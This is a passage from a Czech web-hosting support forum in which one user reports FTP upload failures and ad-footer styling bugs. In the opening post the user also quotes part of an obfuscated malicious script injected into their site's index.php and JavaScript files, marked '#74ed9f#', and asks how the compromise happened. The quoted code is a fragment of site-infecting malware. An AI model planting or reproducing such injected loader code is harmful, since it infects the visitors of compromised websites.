f^98^87^88^9a^6c^69^dc^6c^69^dc\".split(yxj);zpw=\"\";qvys(\"arCode\");tfvvy(\"\"+zpw);}</script> "; echo $r; }
#/74ed9f#
?>>

Proč? --Já to tam nevložil.

Samozřejmě teď mohu inkriminovaný kód smazat, stále se ale ptám "proč?" a prosím o objasnění ... protože pokud mi někdo vložil kód do webu jednou, může to udělat znovu. Je třeba zamezit takovým excesům.

-----

EDIT2: patrně půjde o nějaký hack. Viz google, klíčové slovo #74ed9f#
https://www.google.com/search?q=74ed9f& … =firefox-a
http://translate.google.com/translate?s … 70&act=url
http://forums.whirlpool.net.au/archive/2149466

-----

EDIT3: Dozvídám se tolik nových informací ...
http://sitecheck.sucuri.net/results/icaenel.com
Takže to infikovalo všechny javascript soubory na mém webu, a index.php k tomu (FTP klient ukazuje u těchto souborů čas posledního zápisu 30. 8. 2013, 2:18 v noci)

http://labs.sucuri.net/db/malware/malwa … hole2?v403


Loading jquery or any javascript from an external site is bound to cause problems.
...
If the external site is compromised it could add malware to your page.

Hacknutý přes Google maps API?

Dále používám lokálně nahranou verzi stařičkého jQuery 1.6.1 ... což také může být ono.
Anebo tomu nahrála slabá hesla na loginu webu/ na FTP/ na SQL? (šest lowercase písmen je asi málo, ale patlat se s dlouhými, neintuitivními hesly se mi nikdy nechtělo)

Tak co, odborníci? Kde je jádro pudla?

#7 Re: Ostatní problémy » Změna stylu vkládané reklamy » 2013-01-22 19:08:46

Maky, upozorňoval jsem tu na to stejné (viz zde).

Souhlasím, že jde o obtěžující chybičku. A ty odpovědi od rádce, které jsme oba dostali, působí, jako kdyby se situací defacto nezabýval a házel ji za hlavu.
Pokud se nastavení reklamy samo čas od času změní, tak je to problém - ideálně pak tento problém identfikovat a vyřešit.

#8 Re: Ostatní problémy » Plíživá a sebe-sabotující reklama » 2013-01-19 14:35:13

Už to mám: webadmin.endora.cz > Přehled domén > Reklama > Barva textu > Použít styl webu
Takže nic, není nad samo-odpověď a roztržitého uživatele  :oops: ...

Ale přesto položím záludnou otázku: proč se ta reklama takto sama resetovala do původních hodnot?
No, představte si, že budu mít weby nastavené korektně, dle provozních podmínek, odjedu na půl roku na Antarktidu, a mezitím se nastavení reklamy vyresetuje; jeden web tak docílí např. té úžasné bíle barvy textu na šedobílém pozadí (což je v rozporu s podmínkami), a než se z té Antarktidy vrátím, web už bude smazaný za skrývání reklamy/ porušení podmínek ...

(jen říkám, čistě hypoteticky)

#9 Re: Ostatní problémy » Plíživá a sebe-sabotující reklama » 2013-01-19 14:27:33

Moje zkušenost se má asi takto: prostě jsem si jen hleděl svého, nastavení svých webů jsem měl dávno vyřešené, vše fungovalo jak mělo. Reklama byla nastavena na reklamní patu a já nastavený na spokojeného uživatele.

Dnes se přihlásím a co nevidím: reklama si sama vlezla do textu stránek. OK, přihlásím se tedy na webadmin.endora.cz, dále pak Přehled domén > Reklama > zruším zaškrtnuté "Pokud možno nevkládat reklamní patu".
Potud bez problému ...

Co se ale stylování samotné reklamy týče, ta se rozhodla, že na věc půjde hrubou silou:

<div style="color:#FFFFFF;" ><div class="dulezite">Reklamu na tomto hostingu zajišťuje Business Factory - internetová reklama a pokročilý internetový marketing.</div></div>

Jde mi o ten color:#FFFFFF ...

Na mém prvním webu se reklama zesměšnila sama (bílá na šedobílou) ...
Na mém druhém webu a webu, který spravuji bratranci reklama poněkud vyčnívá, v celé té bílé ...

Mojí otázkou je, co teď s tím? Máme si my uživatelé toto opravit sami (ostylováním div class="dulezite" ?), anebo se na to podíváte vy?

#10 Re: Problémy s FTP » Nefunkční FTP upload » 2011-09-06 19:36:34

Ano, zkoušel.

Aktivní připojení: skončí ihned chybovou hláškou, nedostane se ani na directory listing.
Pasivní připojení: to, co jsem popisoval výše.

WinSCP si o selhávajících uploadech myslí toto:

Timeout detected.
Copying files to remote side failed.
Opening ASCII mode data connection for file.txt

#11 Re: Problémy s FTP » Nefunkční FTP upload » 2011-09-05 21:42:11

Zkoušel jsem jak FileZillu (v nastavení limitovanou na 1 připojení!), tak i TotalCommander 7.55, neúspěšně - viz můj předchozí post.

A abyste neřekl, ještě jsem teď zkusil dalšího FTP klienta - WinSCP 4.3.4. Opět podobný scénář - z kopírovaných dat se zkopírovalo 170kB ze třech souborů, a potom WinSCP vyskočilo s Timeout chybovou hláškou.

Buďto mám opravdu obě ruce levé, anebo se Vám tam něco potentovalo.

#12 Re: Problémy s FTP » Nefunkční FTP upload » 2011-09-03 20:07:42

Vytvořil jsem si prvního nového uživatele, přihlásím se, uploaduji další soubory přes FileZillu, a mám stále stejný problém.
Vytvořil jsem si druhého nového uživatele, přihlásím se, uploaduji další soubor (skriptík, 90kB) - nyní přes TotalCmd 7.55 - a transfer se mi sekne na devíti procentech kompletace.

Ještě podotýkám, že jsem si tu přes FileZillu vesele uploadoval různé skriptíky cca dva roky, a za tu dobu jsem neměl problém, až nyní. Je tedy možné, že zakopaný pes bude někde jinde, než mezi klávesnicí a židlí?

#13 Re: Problémy s FTP » Nefunkční FTP upload » 2011-09-03 17:46:40

Je to nějaké podezřelé.

FileZilla: File -> Site Manager - založím si tam profil pro endoru, jdu editovat onen profil ...
Transfer Settings -> Limit number of simultaneous connections -> Maximum number of connections (1)

Uložím, připojím se pomocí tohoto profilu ... a stále mám stejný problém!

Resp. ten všehospásný 'alternativní klient' je např. který, prosím?

#14 Re: Problémy s FTP » Nefunkční FTP upload » 2011-09-03 09:32:12

Připojuji se z IP 83.240.36.198, používám FTP klienta FileZilla 3.5.1, FTP účet 'pipux'.
Doposud jsem s FTP uploadem na endoře neměl žádný problém, až nyní.

Chci např. uploadnout deset malých souborů - připojím se na FTP, dirctory listing vpořádku; první dva až tři soubory mi to uploadne, další už ne.

Status:	Resolving address of endora.cz
Status:	Connecting to 88.86.120.114:21...
Status:	Connection established, waiting for welcome message...
Response:	220 FTP Server ready.
Command:	USER pipux
Response:	331 Password required for pipux
Command:	PASS ******
Response:	530 Sorry, the maximum number of clients (6) for this user are already connected.
Error:	Critical error
Error:	Could not connect to server

#15 Re: Ostatní problémy » (ne)sémantické značky v reklamě » 2011-07-16 19:26:15

Toto je puntičkářství nejhrubšího zrna ... nicméně k dosažení 100% v SEO analýze zdrojového kódu zlobí reklamní pata:

Jsme světová jednička ve výrobě plotů, proto jsme ta <strong>nejlepší volba</strong> pro vaše plotová řešení. <i>Služby na špičkové úrovni</i> a materiály prvotřídní jakosti jsou pro nás samozřejmostí. Pochlubte se <a href="http://www.ploty-betafence.cz" title="Ploty Betafence">plotem</a> od společnosti Betafence.

Namísto

<i>...</i>

by bylo příhodnější nasadit

<em>...</em>

Díky!

#16 Re: Náměty na inovace » Reklama v <endora> tagu každou chvíli jinak » 2009-11-04 18:11:58

Ad pata: děkuji  big_smile

Ad důvod: zavedením obměňující se reklamy chcete docílit toho, aby se v očích google crawlerů a podobného hmyzu obměňovaly i  dlouho neaktivní statické weby - čímž bude google ony weby hodnotit jako udržované a přiřadí jim vyšší rating a lepší pozice ve vyhledávání. To znamená, že stránky budou hypoteticky zobrazovatelné více lidem, tj. více lidem se zobrazí vaše reklama.

Chytré  smile

#17 Re: Náměty na inovace » Reklama v <endora> tagu každou chvíli jinak » 2009-11-03 21:51:24

Trápí mě pouze <p> tag. Není to neřešitelný problém, ale bylo by hezké, kdybyste zůstal u <div> a <p> zahodil.
Taky by mě zajímalo, čistě ze zvědavosti, proč generujete patu různými způsoby. Záhada  big_smile

#18 Re: Náměty na inovace » Reklama v <endora> tagu každou chvíli jinak » 2009-11-03 20:37:38

Zdá se mi to, nebo provozujete několik od sebe odlišných replacerů na <endora> tag?

Při občasném reloadu stránky se mi zobrazí reklama oddělená symbolem "," , ";", nebo "|". Také je reklama zabalena buď do <p>, nebo do <div> tagu.

Jestli reklama na stránce poskakuje, tak to už je záležiostí konkrétní implementace stylů daného uživate, jasné. Nicméně, mohl byste, drahý administrátore, používat jeden ustálený převod <endora> tagu? To abych mohl v noci klidně spát  roll

Zápatí

Založeno na FluxBB | CZ a SK